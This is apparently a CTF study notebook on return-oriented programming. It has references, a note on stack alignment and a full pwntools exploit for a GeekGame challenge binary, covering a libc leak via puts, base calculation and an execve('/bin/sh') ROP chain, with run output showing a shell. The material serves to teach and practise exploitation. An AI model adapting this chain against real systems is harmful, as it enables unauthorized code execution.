# ROP (return oriented programming)

## Reference

- https://github.com/xairy/easy-linux-pwn
- https://ropemporium.com/guide.html
- https://i.blackhat.com/briefings/asia/2018/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/rop.md

## Pitfalls

### Stack Alignment

Make sure the stack pointer is correctly aligned for the target architecture. The 64 bit calling convention requires the stack to be 16-byte aligned. Otherwise, segfault comes from nowhere. For exmaple, the `movaps` instruction in `buffered_vfprintf()` or `do_system()` may cause segfault.

## Example: pwn

Source: pku-geekgame-0th

In [1]:
bin_filename = './pwn'
from pwn import *
from pwnlib import gdb

context.terminal = ['tmux', 'new-window']
elf = ELF(bin_filename)
context.arch = elf.arch

libc_filename = './libc-2.31.so'
libc = ELF(libc_filename)

[*] '/ctf/work/rop/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/ctf/work/rop/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled


In [2]:
# +1: beacuse the lowest byte happens to be 0x00, which can not be printed by put()
putchar_offset = +1

def payload0():
    rop = ROP(elf)
    rop.call('puts', [elf.got['putchar'] + putchar_offset])
    # rop.raw(rop.search()) # align
    rop.call('run')
    print(rop.dump())
    craft = flat(
        b'a' * 0x80,
        p64(0),      # rbp
        rop.chain()
    )
    assert not b'\n' in craft
    assert not b' ' in craft
    assert not b'\t' in craft
    return craft
payload0()

[*] Loaded 14 cached gadgets for './pwn'
0x0000:         0x4013c3 pop rdi; ret
0x0008:         0x404019 [arg0] rdi = 4210713
0x0010:         0x401040 puts
0x0018:         0x4011ce run()


b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x13@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00@\x10@\x00\x00\x00\x00\x00\xce\x11@\x00\x00\x00\x00\x00'

In [3]:
!one_gadget {libc_filename}

0xe6c7e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6c81 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6c84 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL


In [4]:
def payload1(putchar_addr):
    libc.address = 0
    libc.address = putchar_addr - libc.sym['putchar']
    print(f'{hex(libc.address)=}')
    rop = ROP([elf, libc])
    binsh = next(libc.search(b"/bin/sh\x00"))
    rop.execve(binsh, 0, 0)
    print(rop.dump())
    craft = flat(
        b'a' * 0x80,
        p64(0),      # rbp
        rop.chain()
    )
    assert not b'\n' in craft
    assert not b' ' in craft
    assert not b'\t' in craft
    return craft
payload1(0xff_0015_0000)

hex(libc.address)='0xff000c6c00'
[*] Loaded 201 cached gadgets for './libc-2.31.so'
0x0000:     0xff001e2f71 pop rdx; pop r12; ret
0x0008:              0x0 [arg2] rdx = 0
0x0010:      b'eaaafaaa' <pad r12>
0x0018:     0xff000ee129 pop rsi; ret
0x0020:              0x0 [arg1] rsi = 0
0x0028:         0x4013c3 pop rdi; ret
0x0030:     0xff0027e1aa [arg0] rdi = 1095219274154
0x0038:     0xff001acef0 execve


b"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00\x00\x00\x00\x00\x00\x00\x00q/\x1e\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eaaafaaa)\xe1\x0e\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x13@\x00\x00\x00\x00\x00\xaa\xe1'\x00\xff\x00\x00\x00\xf0\xce\x1a\x00\xff\x00\x00\x00"

In [5]:
def exploit(io: tube):
    io.sendline(b'100')
    io.sendline(payload0())
    io.recvuntil(b'aaaaaa\n')
    putchar_addr = int.from_bytes(b'\x00' * putchar_offset + io.recvline(keepends=False), 'little')
    print(f"{hex(putchar_addr)=}")
    io.sendline(payload1(putchar_addr))

In [6]:
import os
context.aslr = True
io = process(bin_filename, env = {'LD_PRELOAD': libc_filename})
libc_base = io.libs()[os.path.realpath(libc_filename)]
print(f'{hex(libc_base)=}')
# io = gdb.debug([bin_filename], env = {'LD_PRELOAD': libc_filename}, gdbscript=f"""
# b *0x4012A4
# c
# """)
try:
    exploit(io)
    with context.local(log_level='debug'):
        io.sendline(b'echo flag{here}')
        io.sendline(b'exit')
        print(io.recvall())
    io.poll(block=True)
except Exception as e:
    io.kill()
    raise e

[x] Starting local process './pwn'
[+] Starting local process './pwn': pid 9300
hex(libc_base)='0x7fd6f2725000'
0x0000:         0x4013c3 pop rdi; ret
0x0008:         0x404019 [arg0] rdi = 4210713
0x0010:         0x401040 puts
0x0018:         0x4011ce run()
hex(putchar_addr)='0x7fd6f27ae400'
hex(libc.address)='0x7fd6f2725000'
0x0000:   0x7fd6f2841371 pop rdx; pop r12; ret
0x0008:              0x0 [arg2] rdx = 0
0x0010:      b'eaaafaaa' <pad r12>
0x0018:   0x7fd6f274c529 pop rsi; ret
0x0020:              0x0 [arg1] rsi = 0
0x0028:         0x4013c3 pop rdi; ret
0x0030:   0x7fd6f28dc5aa [arg0] rdi = 140561169106346
0x0038:   0x7fd6f280b2f0 execve
[DEBUG] Sent 0x10 bytes:
    b'echo flag{here}\n'
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[x] Receiving all data
[x] Receiving all data: 0B
[*] Process './pwn' stopped with exit code 0 (pid 9300)
[DEBUG] Received 0x74 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n'
    b'flag{h